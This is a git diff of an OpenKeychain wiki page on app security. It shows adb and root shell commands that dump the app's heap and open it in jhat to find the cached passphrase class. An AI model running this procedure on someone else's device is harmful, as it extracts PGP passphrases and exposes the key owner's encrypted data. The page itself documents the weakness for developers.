Updated App Security (markdown)

dschuermann 2014-10-10 03:45:45 -07:00
parent 33fe2e6879
commit a81cbd011d
1 changed files with 19 additions and 18 deletions

@ -33,12 +33,12 @@ TODO, also: https://github.com/open-keychain/open-keychain/issues/894
1. Start OpenKeychain
2. Sign something, caching the passphrase
3.
```
someuser@somehost platform-tools> ./adb shell
$ su
# chmod 777 /data/misc
# ps
USER PID PPID VSIZE RSS WCHAN PC NAME
```
someuser@somehost platform-tools> ./adb shell
$ su
# chmod 777 /data/misc
# ps
USER PID PPID VSIZE RSS WCHAN PC NAME
[...snip...]
app_110 17973 2381 217088 24612 ffffffff afd0ee48 S org.thialfihar.android.apg
shell 18061 2390 648 336 c031b39c afd0eafc S /system/bin/sh
@ -51,18 +51,19 @@ bluetoothd
bluetooth
keystore
vpn
systemkeys
radio
wifi
dhcp
heap-dump-tm1313820900-pid16096.hprof
heap-dump-tm1313854763-pid17973.hprof
# cp /data/misc/heap-dump-tm1313854763-pid17973.hprof /sdcard/
# $ someuser@somehost platform-tools> ./adb pull /sdcard/heap-dump-tm1313854763-pid17973.hprof .
2666 KB/s (4361160 bytes in 1.597s)
someuser@somehost platform-tools> ../tools/hprof-conv heap-dump-tm1313854763-pid17973.hprof apg.hprof
someuser@somehost platform-tools> jhat apg.hprof
```
systemkeys
radio
wifi
dhcp
heap-dump-tm1313820900-pid16096.hprof
heap-dump-tm1313854763-pid17973.hprof
# cp /data/misc/heap-dump-tm1313854763-pid17973.hprof /sdcard/
# $ someuser@somehost platform-tools> ./adb pull /sdcard/heap-dump-tm1313854763-pid17973.hprof .
2666 KB/s (4361160 bytes in 1.597s)
someuser@somehost platform-tools> ../tools/hprof-conv heap-dump-tm1313854763-pid17973.hprof apg.hprof
someuser@somehost platform-tools> jhat apg.hprof
```
4. Open a browser with ``http://localhost:7000`` and find ``CachedPassphrase`` class, see [PassphraseCacheService.java#L517](https://github.com/open-keychain/open-keychain/blob/development/OpenKeychain/src/main/java/org/sufficientlysecure/keychain/service/PassphraseCacheService.java#L517)
### Attacking passphrase cache with root access